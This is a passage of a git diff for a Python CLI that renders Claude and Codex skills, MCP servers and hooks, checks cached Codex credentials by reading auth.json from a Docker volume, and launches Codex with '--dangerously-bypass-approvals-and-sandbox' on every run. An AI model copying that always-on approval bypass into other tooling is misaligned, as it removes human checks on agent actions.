binding into the Claude skill installation surface. + + Writes a skill metadata file under + ``/.claude/.scc-managed/skills//skill.json``. + + Returns: + (rendered_paths, warnings) + + Raises: + MaterializationError: If the skill metadata file cannot be written. + """ + rendered: list[Path] = [] + warnings: list[str] = [] + + skill_ref = binding.native_ref + if not skill_ref: + warnings.append( + f"Skill binding in bundle '{bundle_id}' has no native_ref; " + "cannot determine skill placement" + ) + return rendered, warnings + + # Sanitise the ref for filesystem usage + safe_name = skill_ref.replace("/", "_").replace("\\", "_").replace("..", "_") + + skill_dir = workspace / SCC_MANAGED_DIR / SKILLS_SUBDIR / safe_name + + metadata: dict[str, Any] = { + "native_ref": binding.native_ref, + "provider": binding.provider, + "bundle_id": bundle_id, + "managed_by": "scc", + } + if binding.native_config: + metadata["native_config"] = dict(binding.native_config) + + metadata_path = skill_dir / "skill.json" + try: + skill_dir.mkdir(parents=True, exist_ok=True) + metadata_path.write_text(json.dumps(metadata, indent=2) + "\n") + except OSError as exc: + raise MaterializationError( + bundle_id=bundle_id, + artifact_name=skill_ref, + target_path=str(metadata_path), + reason=str(exc), + ) from exc + rendered.append(metadata_path) + + return rendered, warnings + + +def _render_mcp_binding( + binding: ProviderArtifactBinding, + bundle_id: str, +) -> tuple[dict[str, Any], list[str]]: + """Render an MCP server binding into a settings fragment. + + Produces a ``{server_name: server_config}`` dict suitable for merging + into the ``mcpServers`` key of settings.local.json. + + Returns: + (mcp_config_dict, warnings) + """ + warnings: list[str] = [] + + server_name = binding.native_ref or f"scc-{bundle_id}-mcp" + transport = binding.transport_type or "sse" + config = dict(binding.native_config) + + server_config: dict[str, Any] = {"type": transport} + + if transport in ("sse", "http"): + url = config.pop("url", None) + if url: + server_config["url"] = url + else: + warnings.append( + f"MCP server '{server_name}' has transport '{transport}' " + "but no 'url' in binding native_config" + ) + # Collect header_* keys → headers dict + headers: dict[str, str] = {} + for key in list(config): + if key.startswith("header_"): + headers[key[7:]] = config.pop(key) + if headers: + server_config["headers"] = headers + + elif transport == "stdio": + command = config.pop("command", None) + if command: + server_config["command"] = command + else: + warnings.append( + f"MCP server '{server_name}' has transport 'stdio' " + "but no 'command' in binding native_config" + ) + args_raw = config.pop("args", None) + if args_raw: + server_config["args"] = ( + args_raw.split() if isinstance(args_raw, str) else [str(args_raw)] + ) + # Collect env_* keys → env dict + env: dict[str, str] = {} + for key in list(config): + if key.startswith("env_"): + env[key[4:]] = config.pop(key) + if env: + server_config["env"] = env + + return {server_name: server_config}, warnings + + +def _render_native_integration_binding( + binding: ProviderArtifactBinding, + workspace: Path, + bundle_id: str, +) -> tuple[list[Path], dict[str, Any], list[str]]: + """Render a native integration binding into Claude-specific surfaces. + + Processes known native_config keys: + - ``hooks``: writes hook metadata under ``.scc-managed/hooks/`` + - ``marketplace_bundle``: adds extraKnownMarketplaces entry to fragment + - ``plugin_bundle``: adds enabledPlugins entry to fragment + - ``instructions``: writes instruction metadata under ``.scc-managed/instructions/`` + + Returns: + (rendered_paths, settings_fragment, warnings) + + Raises: + MaterializationError: If any file write operation fails. + """ + rendered: list[Path] = [] + warnings: list[str] = [] + settings: dict[str, Any] = {} + config = binding.native_config + + # ── hooks ────────────────────────────────────────────────────────────── + if "hooks" in config: + hooks_ref = config["hooks"] + hooks_dir = workspace / SCC_MANAGED_DIR / HOOKS_SUBDIR + + safe_name = Path(hooks_ref).stem + hooks_metadata: dict[str, Any] = { + "source": hooks_ref, + "provider": "claude", + "bundle_id": bundle_id, + "managed_by": "scc", + } + hooks_path = hooks_dir / f"{safe_name}.json" + try: + hooks_dir.mkdir(parents=True, exist_ok=True) + hooks_path.write_text(json.dumps(hooks_metadata, indent=2) + "\n") + except OSError as exc: + raise MaterializationError( + bundle_id=bundle_id, + artifact_name=f"hooks:{hooks_ref}", + target_path=str(hooks_path), + reason=str(exc), + ) from exc + rendered.append(hooks_path) + + # ── marketplace_bundle ───────────────────────────────────────────────── + if "marketplace_bundle" in config: + marketplace_ref = config["marketplace_bundle"] + marketplace_name = Path(marketplace_ref).name + settings.setdefault("extraKnownMarketplaces", {})[marketplace_name] = { + "source": { + "source": "directory", + "path": marketplace_ref, + }, + } + + # ── plugin_bundle ────────────────────────────────────────────────────── + if "plugin_bundle" in config: + plugin_ref = config["plugin_bundle"] + plugin_name = Path(plugin_ref).name + settings.setdefault("enabledPlugins", {})[plugin_name] = True + + # ── instructions ─────────────────────────────────────────────────────── + if "instructions" in config: + instructions_ref = config["instructions"] + instructions_dir = workspace / SCC_MANAGED_DIR / INSTRUCTIONS_SUBDIR + + safe_name = Path(instructions_ref).stem + instructions_metadata: dict[str, Any] = { + "source": instructions_ref, + "provider": "claude", + "bundle_id": bundle_id, + "managed_by": "scc", + } + instr_path = instructions_dir / f"{safe_name}.json" + try: + instructions_dir.mkdir(parents=True, exist_ok=True) + instr_path.write_text(json.dumps(instructions_metadata, indent=2) + "\n") + except OSError as exc: + raise MaterializationError( + bundle_id=bundle_id, + artifact_name=f"instructions:{instructions_ref}", + target_path=str(instr_path), + reason=str(exc), + ) from exc + rendered.append(instr_path) + + return rendered, settings, warnings + + +# --------------------------------------------------------------------------- +# Settings fragment merge helper +# --------------------------------------------------------------------------- + + +def _merge_settings_fragment( + target: dict[str, Any], + source: dict[str, Any], +) -> None: + """Merge *source* settings fragment into *target*, combining nested dicts.""" + for key, value in source.items(): + if key in target and isinstance(target[key], dict) and isinstance(value, dict): + target[key].update(value) + else: + target[key] = value + + +# --------------------------------------------------------------------------- +# Binding classifier +# --------------------------------------------------------------------------- + + +def _classify_binding( + binding: ProviderArtifactBinding, +) -> str: + """Classify a binding as 'skill', 'mcp', 'native', or 'unknown'. + + Classification order: + 1. native_config contains integration keys → native + 2. transport_type is set → mcp + 3. native_ref is set (no integration keys) → skill + 4. otherwise → unknown + """ + native_keys = set(binding.native_config.keys()) + if native_keys & _INTEGRATION_KEYS: + return "native" + if binding.transport_type: + return "mcp" + if binding.native_ref: + return "skill" + return "unknown" + + +# --------------------------------------------------------------------------- +# Portable artifact rendering (D023) +# --------------------------------------------------------------------------- + + +def _render_portable_skill( + artifact: PortableArtifact, + workspace: Path, + bundle_id: str, +) -> tuple[list[Path], list[str]]: + """Render a portable skill that has no provider-specific binding. + + Uses the artifact's source metadata to write skill placement metadata + under ``.claude/.scc-managed/skills//skill.json``. + + Returns: + (rendered_paths, warnings) + + Raises: + MaterializationError: If the skill metadata file cannot be written. + """ + rendered: list[Path] = [] + warnings: list[str] = [] + + safe_name = artifact.name.replace("/", "_").replace("\\", "_").replace("..", "_") + skill_dir = workspace / SCC_MANAGED_DIR / SKILLS_SUBDIR / safe_name + + metadata: dict[str, Any] = { + "name": artifact.name, + "provider": "claude", + "bundle_id": bundle_id, + "managed_by": "scc", + "portable": True, + } + if artifact.source_type: + metadata["source_type"] = artifact.source_type + if artifact.source_url: + metadata["source_url"] = artifact.source_url + if artifact.source_path: + metadata["source_path"] = artifact.source_path + if artifact.source_ref: + metadata["source_ref"] = artifact.source_ref + if artifact.version: + metadata["version"] = artifact.version + + metadata_path = skill_dir / "skill.json" + try: + skill_dir.mkdir(parents=True, exist_ok=True) + metadata_path.write_text(json.dumps(metadata, indent=2) + "\n") + except OSError as exc: + raise MaterializationError( + bundle_id=bundle_id, + artifact_name=artifact.name, + target_path=str(metadata_path), + reason=str(exc), + ) from exc + rendered.append(metadata_path) + + return rendered, warnings + + +def _render_portable_mcp( + artifact: PortableArtifact, + bundle_id: str, +) -> tuple[dict[str, Any], list[str]]: + """Render a portable MCP server that has no provider-specific binding. + + Uses the artifact's source metadata to produce a settings fragment entry. + For MCP servers with source_url, renders as SSE transport by default. + + Returns: + (mcp_config_dict, warnings) + """ + warnings: list[str] = [] + + server_name = artifact.name + server_config: dict[str, Any] = { + "managed_by": "scc", + "bundle_id": bundle_id, + "portable": True, + } + + if artifact.source_url: + server_config["type"] = "sse" + server_config["url"] = artifact.source_url + else: + warnings.append( + f"Portable MCP server '{artifact.name}' in bundle '{bundle_id}' " + "has no source_url; cannot determine connection endpoint" + ) + server_config["type"] = "sse" + + if artifact.source_ref: + server_config["source_ref"] = artifact.source_ref + if artifact.version: + server_config["version"] = artifact.version + + return {server_name: server_config}, warnings + + +# --------------------------------------------------------------------------- +# Main renderer +# --------------------------------------------------------------------------- + + +def render_claude_artifacts( + plan: ArtifactRenderPlan, + workspace: Path, +) -> RendererResult: + """Project an ArtifactRenderPlan into Claude-native surfaces. + + Consumes a provider-neutral ArtifactRenderPlan produced by the core + bundle resolver and renders it into Claude Code's native file structures. + + Rendering is deterministic and idempotent — the same plan and workspace + always produce the same output. + + The renderer dispatches each binding based on its characteristics: + - Bindings with integration-specific native_config keys → native integration + - Bindings with transport_type → MCP server definition + - Bindings with only native_ref → skill placement + + The ``settings_fragment`` in the result is NOT written to + settings.local.json by the renderer. The calling launch pipeline + (T05) owns the merge into the active settings file. + + Args: + plan: ArtifactRenderPlan to render (must target provider 'claude'). + workspace: Root directory for the workspace (project root). + + Returns: + RendererResult with rendered paths, skipped items, warnings, + and a settings fragment for the caller to merge. + """ + if plan.provider != "claude": + return RendererResult( + warnings=(f"Plan targets provider '{plan.provider}', not 'claude'; nothing rendered",), + skipped_artifacts=plan.effective_artifacts, + ) + + all_rendered: list[Path] = [] + all_warnings: list[str] = [] + merged_settings: dict[str, Any] = {} + + for binding in plan.bindings: + if binding.provider != "claude": + all_warnings.append( + f"Binding for provider '{binding.provider}' found in " + f"Claude plan for bundle '{plan.bundle_id}'; skipping" + ) + continue + + kind = _classify_binding(binding) + + if kind == "native": + paths, fragment, warnings = _render_native_integration_binding( + binding, workspace, plan.bundle_id + ) + all_rendered.extend(paths) + all_warnings.extend(warnings) + _merge_settings_fragment(merged_settings, fragment) + + elif kind == "mcp": + mcp_config, warnings = _render_mcp_binding(binding, plan.bundle_id) + all_warnings.extend(warnings) + merged_settings.setdefault("mcpServers", {}).update(mcp_config) + + elif kind == "skill": + paths, warnings = _render_skill_binding(binding, workspace, plan.bundle_id) + all_rendered.extend(paths) + all_warnings.extend(warnings) + + else: + all_warnings.append( + f"Binding in bundle '{plan.bundle_id}' has no native_ref, " + "transport_type, or recognised native_config keys; skipping" + ) + + # Render portable artifacts that have no provider-specific binding (D023) + for portable in plan.portable_artifacts: + if portable.kind == ArtifactKind.SKILL: + paths, warnings = _render_portable_skill(portable, workspace, plan.bundle_id) + all_rendered.extend(paths) + all_warnings.extend(warnings) + + elif portable.kind == ArtifactKind.MCP_SERVER: + mcp_config, warnings = _render_portable_mcp(portable, plan.bundle_id) + all_warnings.extend(warnings) + merged_settings.setdefault("mcpServers", {}).update(mcp_config) + + # Write the settings fragment to a per-bundle file for audit/debug + if merged_settings: + settings_dir = workspace / ".claude" + + safe_bundle = plan.bundle_id.replace("/", "_").replace("\\", "_") + fragment_path = settings_dir / f".scc-settings-{safe_bundle}.json" + try: + settings_dir.mkdir(parents=True, exist_ok=True) + fragment_path.write_text(json.dumps(merged_settings, indent=2) + "\n") + except OSError as exc: + raise MaterializationError( + bundle_id=plan.bundle_id, + artifact_name="settings_fragment", + target_path=str(fragment_path), + reason=str(exc), + ) from exc + all_rendered.append(fragment_path) + + return RendererResult( + rendered_paths=tuple(all_rendered), + skipped_artifacts=plan.skipped, + warnings=tuple(all_warnings), + settings_fragment=merged_settings, + ) diff --git a/src/scc_cli/adapters/claude_safety_adapter.py b/src/scc_cli/adapters/claude_safety_adapter.py new file mode 100644 index 0000000..903b5e4 --- /dev/null +++ b/src/scc_cli/adapters/claude_safety_adapter.py @@ -0,0 +1,47 @@ +"""Claude-specific safety adapter — UX formatting and audit emission.""" + +from __future__ import annotations + +from scc_cli.core.contracts import AuditEvent, SafetyCheckResult, SafetyPolicy +from scc_cli.core.enums import SeverityLevel +from scc_cli.ports.audit_event_sink import AuditEventSink +from scc_cli.ports.safety_engine import SafetyEngine + + +class ClaudeSafetyAdapter: + """Wraps SafetyEngine with Claude-specific user messages and audit events.""" + + def __init__(self, engine: SafetyEngine, audit_sink: AuditEventSink) -> None: + self._engine = engine + self._audit_sink = audit_sink + + def check_command(self, command: str, policy: SafetyPolicy) -> SafetyCheckResult: + """Evaluate *command* against *policy*, emit audit, return formatted result.""" + verdict = self._engine.evaluate(command, policy) + + severity = SeverityLevel.WARNING if not verdict.allowed else SeverityLevel.INFO + if verdict.allowed: + user_message = "[Claude] Command allowed" + else: + user_message = f"[Claude] Command blocked: {verdict.reason}" + + event = AuditEvent( + event_type="safety.check", + message=user_message, + severity=severity, + subject="claude", + metadata={ + "provider_id": "claude", + "command": command, + "verdict_allowed": str(verdict.allowed).lower(), + "matched_rule": verdict.matched_rule or "", + "command_family": verdict.command_family or "", + }, + ) + self._audit_sink.append(event) + + return SafetyCheckResult( + verdict=verdict, + user_message=user_message, + audit_emitted=True, + ) diff --git a/src/scc_cli/claude_adapter.py b/src/scc_cli/adapters/claude_settings.py similarity index 99% rename from src/scc_cli/claude_adapter.py rename to src/scc_cli/adapters/claude_settings.py index a761211..433e878 100644 --- a/src/scc_cli/claude_adapter.py +++ b/src/scc_cli/adapters/claude_settings.py @@ -1,6 +1,8 @@ """ Claude Code Settings Adapter. +Canonical location: scc_cli.adapters.claude_settings + This module is the ONLY place that knows about Claude Code's settings format. If Claude Code changes its format, update ONLY this file + test_claude_adapter.py. @@ -9,7 +11,7 @@ - enabledPlugins: list of "plugin@marketplace" strings MAINTENANCE RULE: If Claude Code changes format, update ONLY: -1. claude_adapter.py - this file +1. adapters/claude_settings.py - this file 2. test_claude_adapter.py - adapter output shape tests No other module should import or reference extraKnownMarketplaces or enabledPlugins. diff --git a/src/scc_cli/adapters/codex_agent_provider.py b/src/scc_cli/adapters/codex_agent_provider.py new file mode 100644 index 0000000..43fb53e --- /dev/null +++ b/src/scc_cli/adapters/codex_agent_provider.py @@ -0,0 +1,233 @@ +"""Codex adapter for AgentProvider port.""" + +from __future__ import annotations + +import json +import logging +import subprocess +from collections.abc import Mapping +from pathlib import Path +from typing import Any + +from scc_cli.adapters.codex_auth import run_codex_browser_auth +from scc_cli.adapters.codex_launch import build_codex_container_argv +from scc_cli.adapters.codex_renderer import render_codex_artifacts +from scc_cli.core.contracts import ( + AgentLaunchSpec, + AuthReadiness, + ProviderCapabilityProfile, + RenderArtifactsResult, +) +from scc_cli.core.errors import ProviderNotReadyError +from scc_cli.core.governed_artifacts import ArtifactRenderPlan + +logger = logging.getLogger(__name__) + +_CODEX_AUTH_FILE = "auth.json" +_CODEX_DATA_VOLUME = "docker-codex-sandbox-data" + + +class CodexAgentProvider: + """AgentProvider implementation for OpenAI Codex. + + Translates provider config and workspace context into a typed AgentLaunchSpec + that the runtime layer can consume without importing Codex internals directly. + """ + + def capability_profile(self) -> ProviderCapabilityProfile: + return ProviderCapabilityProfile( + provider_id="codex", + display_name="Codex", + required_destination_set="openai-core", + supports_resume=False, + supports_skills=True, + supports_native_integrations=True, + ) + + def auth_check(self) -> AuthReadiness: + """Check whether Codex auth credentials are cached in the data volume. + + Probes the Docker named volume for ``auth.json``. Validates that the + file exists, is non-empty, and contains parseable JSON. Wording is + truthful: "auth cache present" — we verify the file, not whether the + token is actually valid or unexpired. + """ + volume = _CODEX_DATA_VOLUME + auth_file = _CODEX_AUTH_FILE + mechanism = "auth_json_file" + + # Step 1: volume existence + try: + vol_result = subprocess.run( + ["docker", "volume", "inspect", volume], + capture_output=True, + timeout=10, + ) + except (subprocess.TimeoutExpired, FileNotFoundError, OSError): + return AuthReadiness( + status="missing", + mechanism=mechanism, + guidance=f"Cannot reach Docker to check volume '{volume}'", + ) + + if vol_result.returncode != 0: + return AuthReadiness( + status="missing", + mechanism=mechanism, + guidance="Run 'scc start --provider codex' to perform initial auth setup", + ) + + # Step 2: read file content from volume + try: + file_result = subprocess.run( + [ + "docker", + "run", + "--rm", + "-v", + f"{volume}:/check", + "alpine", + "cat", + f"/check/{auth_file}", + ], + capture_output=True, + timeout=30, + ) + except (subprocess.TimeoutExpired, FileNotFoundError, OSError): + return AuthReadiness( + status="missing", + mechanism=mechanism, + guidance="Timed out reading auth file from volume", + ) + + if file_result.returncode != 0: + return AuthReadiness( + status="missing", + mechanism=mechanism, + guidance=( + f"Auth file '{auth_file}' not found in volume '{volume}'. " + "Run 'scc start --provider codex' to authenticate." + ), + ) + + # Step 3: non-empty + parseable JSON + content = file_result.stdout.strip() + if not content: + return AuthReadiness( + status="missing", + mechanism=mechanism, + guidance=( + f"Auth file '{auth_file}' is empty. " + "Run 'scc start --provider codex' to authenticate." + ), + ) + + try: + json.loads(content) + except (json.JSONDecodeError, ValueError): + return AuthReadiness( + status="missing", + mechanism=mechanism, + guidance=( + f"Auth file '{auth_file}' contains invalid JSON. " + "Run 'scc start --provider codex' to re-authenticate." + ), + ) + + return AuthReadiness( + status="present", + mechanism=mechanism, + guidance="Codex auth cache present — no action needed", + ) + + def bootstrap_auth(self) -> None: + """Establish Codex auth using the normal browser flow on the host.""" + return_code = run_codex_browser_auth() + readiness = self.auth_check() + if readiness.status == "present": + return + if return_code != 0: + raise ProviderNotReadyError( + provider_id="codex", + user_message=("Codex browser sign-in did not complete successfully."), + suggested_action=( + "Retry the sign-in flow. If browser login is unavailable, use the " + "device-code fallback instead." + ), + ) + raise ProviderNotReadyError( + provider_id="codex", + user_message="Codex sign-in finished, but no reusable auth cache was written.", + suggested_action=( + "Retry the sign-in flow. If browser login is unavailable, use the " + "device-code fallback instead." + ), + ) + + def prepare_launch( + self, + *, + config: Mapping[str, Any], + workspace: Path, + settings_path: Path | None = None, + ) -> AgentLaunchSpec: + """Build a Codex-owned launch specification for one workspace. + + Args: + config: Rendered agent settings payload. Consumed by the settings + artifact; not injected as env vars. + workspace: Launch working directory. + settings_path: Container path for a rendered settings artifact, + if any was built by the sync path. + + Returns: + Typed launch spec carrying Codex's argv, workdir, and artifact paths. + """ + artifact_paths: tuple[Path, ...] = (settings_path,) if settings_path is not None else () + return AgentLaunchSpec( + provider_id="codex", + argv=build_codex_container_argv(), + env={}, + workdir=workspace, + artifact_paths=artifact_paths, + required_destination_sets=("openai-core",), + ) + + def render_artifacts( + self, + plan: ArtifactRenderPlan, + workspace: Path, + ) -> RenderArtifactsResult: + """Render governed artifacts into Codex-native surfaces. + + Delegates to :func:`codex_renderer.render_codex_artifacts` and wraps + the adapter-specific ``RendererResult`` into the provider-neutral + ``RenderArtifactsResult`` for the launch pipeline. + + Args: + plan: ArtifactRenderPlan targeting provider ``'codex'``. + workspace: Root directory for the workspace (project root). + + Returns: + RenderArtifactsResult with rendered paths, skipped artifacts, + warnings, and a settings fragment (mcp_fragment from Codex + renderer mapped to settings_fragment in the unified result). + + Raises: + RendererError: If fail-closed rendering encounters a failure. + """ + result = render_codex_artifacts(plan, workspace) + logger.info( + "Codex renderer: %d paths rendered, %d skipped, %d warnings for bundle '%s'", + len(result.rendered_paths), + len(result.skipped_artifacts), + len(result.warnings), + plan.bundle_id, + ) + return RenderArtifactsResult( + rendered_paths=result.rendered_paths, + skipped_artifacts=result.skipped_artifacts, + warnings=result.warnings, + # Codex renderer returns mcp_fragment; map to unified settings_fragment + settings_fragment=result.mcp_fragment, + ) diff --git a/src/scc_cli/adapters/codex_agent_runner.py b/src/scc_cli/adapters/codex_agent_runner.py new file mode 100644 index 0000000..e6925fb --- /dev/null +++ b/src/scc_cli/adapters/codex_agent_runner.py @@ -0,0 +1,79 @@ +"""Codex CLI adapter for AgentRunner port.""" + +from __future__ import annotations + +from pathlib import Path +from typing import Any + +from scc_cli.adapters.codex_launch import build_codex_container_argv +from scc_cli.ports.agent_runner import AgentRunner +from scc_cli.ports.models import AgentCommand, AgentSettings + +DEFAULT_SETTINGS_PATH = Path("/home/agent/.codex/config.toml") + + +def _serialize_toml(config: dict[str, Any]) -> bytes: + """Serialize a flat dict to TOML bytes. + + Supports str, bool, int, and float values. Nested dicts produce + ``[section]`` headers. This is intentionally minimal — Codex + config.toml is a flat key-value surface. + """ + lines: list[str] = [] + nested: dict[str, dict[str, Any]] = {} + for key in sorted(config): + val = config[key] + if isinstance(val, dict): + nested[key] = val + else: + lines.append(_toml_kv(key, val)) + for section in sorted(nested): + lines.append(f"\n[{section}]") + for key in sorted(nested[section]): + lines.append(_toml_kv(key, nested[section][key])) + text = "\n".join(lines) + if text and not text.endswith("\n"): + text += "\n" + return text.encode() + + +def _toml_kv(key: str, val: Any) -> str: + if isinstance(val, bool): + return f"{key} = {'true' if val else 'false'}" + if isinstance(val, (int, float)): + return f"{key} = {val}" + return f'{key} = "{val}"' + + +class CodexAgentRunner(AgentRunner): + """AgentRunner implementation for OpenAI Codex CLI.""" + + # Keys that SCC always injects into the Codex config layer. + # D040: force file-based auth caching so auth.json persists in the + # provider volume (/home/agent/.codex/) across container restarts. + _SCC_MANAGED_DEFAULTS: dict[str, Any] = { + "cli_auth_credentials_store": "file", + } + + def build_settings( + self, config: dict[str, Any], *, path: Path = DEFAULT_SETTINGS_PATH + ) -> AgentSettings: + # D040: merge SCC-managed defaults *under* caller-supplied values + # so that governed config can override if needed, but the file-based + # auth store is always present when no explicit override exists. + merged = {**self._SCC_MANAGED_DEFAULTS, **config} + rendered = _serialize_toml(merged) + return AgentSettings(rendered_bytes=rendered, path=path, suffix=".toml") + + def build_command(self, settings: AgentSettings) -> AgentCommand: + # SCC's container isolation is the hard enforcement boundary. + # Interactive auth bootstrap happens before launch; the steady-state + # container command is the real Codex TUI plus SCC's bypass flag. + return AgentCommand( + argv=list(build_codex_container_argv()), + env={}, + workdir=settings.path.parent, + ) + + def describe(self) -> str: + return "Codex" diff --git a/src/scc_cli/adapters/codex_auth.py b/src/scc_cli/adapters/codex_auth.py new file mode 100644 index 0000000..4caea64 --- /dev/null +++ b/src/scc_cli/adapters/codex_auth.py @@ -0,0 +1,78 @@ +"""Host-browser auth bootstrap for containerized Codex sessions.""" + +from __future__ import annotations + +import socket +import subprocess + +from scc_cli.core.errors import ProviderNotReadyError +from scc_cli.core.provider_registry import get_runtime_spec + +AUTH_CALLBACK_PORT = 1455 +AUTH_RELAY_PORT = 1456 + + +def _build_auth_relay_command() -> str: + """Return the shell command that exposes Codex's loopback callback server. + + Codex binds its browser-login callback listener to ``127.0.0.1:1455`` inside + the container. Docker port publishing cannot expose that loopback-only + listener directly, so we run a tiny relay on ``0.0.0.0:1456`` and publish + the host callback port to that relay instead. + """ + return ( + f"socat TCP-LISTEN:{AUTH_RELAY_PORT},bind=0.0.0.0,reuseaddr,fork " + f"TCP:127.0.0.1:{AUTH_CALLBACK_PORT} & " + "exec codex login -c cli_auth_credentials_store=file" + ) + + +def build_codex_browser_auth_command() -> list[str]: + """Build the temporary Docker command for browser-based Codex login.""" + spec = get_runtime_spec("codex") + return [ + "docker", + "run", + "--rm", + "-it", + "--entrypoint", + "/bin/sh", + "-p", + f"127.0.0.1:{AUTH_CALLBACK_PORT}:{AUTH_RELAY_PORT}", + "-v", + f"{spec.data_volume}:/home/agent/{spec.config_dir}", + "-w", + "/home/agent", + spec.image_ref, + "-lc", + _build_auth_relay_command(), + ] + + +def run_codex_browser_auth() -> int: + """Run browser-based Codex login against the persistent provider volume.""" + if not _is_local_callback_port_available(AUTH_CALLBACK_PORT): + raise ProviderNotReadyError( + provider_id="codex", + user_message=( + "Codex browser sign-in cannot start because localhost:1455 is already in use." + ), + suggested_action=( + "Free port 1455 and try again. If browser login is unavailable in this " + "environment, use the device-code fallback instead." + ), + ) + + result = subprocess.run(build_codex_browser_auth_command(), check=False) + return result.returncode + + +def _is_local_callback_port_available(port: int) -> bool: + """Return True when the localhost callback port can be bound.""" + with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock: + sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) + try: + sock.bind(("127.0.0.1", port)) + except OSError: + return False + return True diff --git a/src/scc_cli/adapters/codex_launch.py b/src/scc_cli/adapters/codex_launch.py new file mode 100644 index 0000000..e6d89d4 --- /dev/null +++ b/src/scc_cli/adapters/codex_launch.py @@ -0,0 +1,10 @@ +"""Shared Codex launch helpers for SCC container sessions.""" + +from __future__ import annotations + +CODEX_DANGER_FLAG = "--dangerously-bypass-approvals-and-sandbox" + + +def build_codex_container_argv() -> tuple[str, ...]: + """Return the canonical Codex argv for containerized SCC sessions.""" + return ("codex", CODEX_DANGER_FLAG) diff --git a/src/scc_cli/adapters/codex_renderer.py b/src/scc_cli/adapters/codex_renderer.py new file mode 100644 index 0000000..8b005fc --- /dev/null +++ b/src/scc_cli/adapters/codex_renderer.py @@ -0,0 +1,591 @@ +"""Codex renderer: project ArtifactRenderPlan into Codex-native surfaces. + +Adapter-owned renderer that consumes a provider-neutral ArtifactRenderPlan +and projects it into Codex's native file structures and config surfaces. + +Codex-native surfaces (per spec-06): +- Skills: writes ``skill.json`` metadata under ``.agents/skills/{name}/`` +- MCP servers: produces an ``.mcp.json`` fragment for the caller to merge +- Native integrations (metadata-only — the renderer writes SCC-managed + JSON metadata files, not the actual native content): + - ``.codex-plugin/plugin.json``: plugin manifest referencing a source + - ``.codex/rules/{name}.rules.json``: rule metadata with ``managed_by: scc`` + - ``.codex/hooks.json``: hook metadata under an ``scc_managed`` key + - ``.codex/.scc-managed/instructions/{name}.json``: instruction metadata + +Codex surfaces are intentionally asymmetric from Claude (D019/spec-06). +Rules and hooks are separate native config surfaces, not plugin components. +The renderer does NOT force Codex surfaces into Claude plugin shapes. + +The renderer is deterministic and idempotent — the same plan + workspace +always produce the same output. Actual content fetching (git clone, URL +download) is NOT the renderer's job; it writes metadata and references that +the launch pipeline or runtime can later resolve. +""" + +from __future__ import annotations + +import json +import logging +from dataclasses import dataclass, field +from pathlib import Path +from typing import Any + +from scc_cli.core.errors import MaterializationError +from scc_cli.core.governed_artifacts import ( + ArtifactKind, + ArtifactRenderPlan, + PortableArtifact, + ProviderArtifactBinding, +) + +logger = logging.getLogger(__name__) + +# --------------------------------------------------------------------------- +# Renderer result +# --------------------------------------------------------------------------- + + +@dataclass(frozen=True) +class RendererResult: + """Result of rendering an ArtifactRenderPlan to Codex-native surfaces. + + Attributes: + rendered_paths: Files/directories written to workspace. + skipped_artifacts: Artifact names that were in the plan but could not + be rendered (carried from the plan or added by the renderer). + warnings: Non-fatal issues encountered during rendering. + mcp_fragment: Dict fragment to merge into .mcp.json. + Caller (launch pipeline) owns the actual merge. + """ + + rendered_paths: tuple[Path, ...] = () + skipped_artifacts: tuple[str, ...] = () + warnings: tuple[str, ...] = () + mcp_fragment: dict[str, Any] = field(default_factory=dict) + + +# --------------------------------------------------------------------------- +# Constants +# --------------------------------------------------------------------------- + +# Codex skill installation surface. +SKILLS_DIR = ".agents/skills" + +# Codex config directories. +CODEX_CONFIG_DIR = ".codex" +CODEX_RULES_DIR = ".codex/rules" +CODEX_PLUGIN_DIR = ".codex-plugin" + +# SCC-managed output directory within the Codex workspace for instructions. +SCC_MANAGED_DIR = ".codex/.scc-managed" +INSTRUCTIONS_SUBDIR = "instructions" + +# SCC section markers for merge-safe single-file surfaces. +SCC_SECTION_START = "# --- SCC-MANAGED START (do not edit) ---" +SCC_SECTION_END = "# --- SCC-MANAGED END ---" + +# Known native_config keys for Codex native integrations. +_INTEGRATION_KEYS = frozenset({"plugin_bundle", "rules", "hooks", "instructions"}) + + +# --------------------------------------------------------------------------- +# Binding dispatch helpers +# --------------------------------------------------------------------------- + + +def _render_skill_binding( + binding: ProviderArtifactBinding, + workspace: Path, + bundle_id: str, +) -> tuple[list[Path], list[str]]: + """Render a skill binding into the Codex skill installation surface. + + Writes a skill metadata file under + ``/.agents/skills//skill.json``. + + Returns: + (rendered_paths, warnings) + + Raises: + MaterializationError: If the skill metadata file cannot be written. + """ + rendered: list[Path] = [] + warnings: list[str] = [] + + skill_ref = binding.native_ref + if not skill_ref: + warnings.append( + f"Skill binding in bundle '{bundle_id}' has no native_ref; " + "cannot determine skill placement" + ) + return rendered, warnings + + # Sanitise the ref for filesystem usage + safe_name = skill_ref.replace("/", "_").replace("\\", "_").replace("..", "_") + + skill_dir = workspace / SKILLS_DIR / safe_name + + metadata: dict[str, Any] = { + "native_ref": binding.native_ref, + "provider": binding.provider, + "bundle_id": bundle_id, + "managed_by": "scc", + } + if binding.native_config: + metadata["native_config"] = dict(binding.native_config) + + metadata_path = skill_dir / "skill.json" + try: + skill_dir.mkdir(parents=True, exist_ok=True) + metadata_path.write_text(json.dumps(metadata, indent=2) + "\n") + except OSError as exc: + raise MaterializationError( + bundle_id=bundle_id, + artifact_name=skill_ref, + target_path=str(metadata_path), + reason=str(exc), + ) from exc + rendered.append(metadata_path) + + return rendered, warnings + + +def _render_mcp_binding( + binding: ProviderArtifactBinding, + bundle_id: str, +) -> tuple[dict[str, Any], list[str]]: + """Render an MCP server binding into an .mcp.json fragment. + + Produces a ``{server_name: server_config}`` dict suitable for merging + into the workspace ``.mcp.json`` file. + + Returns: + (mcp_config_dict, warnings) + """ + warnings: list[str] = [] + + server_name = binding.native_ref or f"scc-{bundle_id}-mcp" + transport = binding.transport_type or "sse" + config = dict(binding.native_config) + + server_config: dict[str, Any] = {"type": transport} + + if transport in ("sse", "http"): + url = config.pop("url", None) + if url: + server_config["url"] = url + else: + warnings.append( + f"MCP server '{server_name}' has transport '{transport}' " + "but no 'url' in binding native_config" + ) + # Collect header_* keys → headers dict + headers: dict[str, str] = {} + for key in list(config): + if key.startswith("header_"): + headers[key[7:]] = config.pop(key) + if headers: + server_config["headers"] = headers + + elif transport == "stdio": + command = config.pop("command", None) + if command: + server_config["command"] = command + else: + warnings.append( + f"MCP server '{server_name}' has transport 'stdio' " + "but no 'command' in binding native_config" + ) + args_raw = config.pop("args", None) + if args_raw: + server_config["args"] = ( + args_raw.split() if isinstance(args_raw, str) else 